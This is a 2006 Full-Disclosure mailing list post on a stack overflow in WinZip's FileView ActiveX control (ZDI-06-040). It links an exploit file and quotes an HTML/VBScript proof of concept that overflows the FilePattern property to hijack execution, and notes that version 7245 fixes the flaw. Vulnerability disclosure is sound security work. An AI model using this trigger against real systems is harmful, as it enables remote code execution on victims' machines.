[Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
Micheal Turner
wh1t3h4t3 at yahoo.co.uk
Wed Nov 15 14:17:12 GMT 2006
here we go, enjoy!
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c
--- Micheal Turner <wh1t3h4t3 at yahoo.co.uk> wrote:
> 7245 correctly resolves this issue; standard stack
> overflow in WZFILEVIEW.FilePattern snatching EIP;
> PoC
> below;
>
> <HTML>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
> <BODY>
> <SCRIPT LANGUAGE="VBScript">
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
> </SCRIPT>
> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
>
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> </OBJECT>
> </BODY>
> </HTML>
>
>
> -- prdelka
>
>
>
>
>
>
>
___________________________________________________________
>
> All new Yahoo! Mail "The new Interface is stunning
> in its simplicity and ease of use." - PC Magazine
> http://uk.docs.yahoo.com/nowyoucan.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
>
Send instant messages to your online friends http://uk.messenger.yahoo.com
Full-Disclosure is hosted and sponsored by Secunia.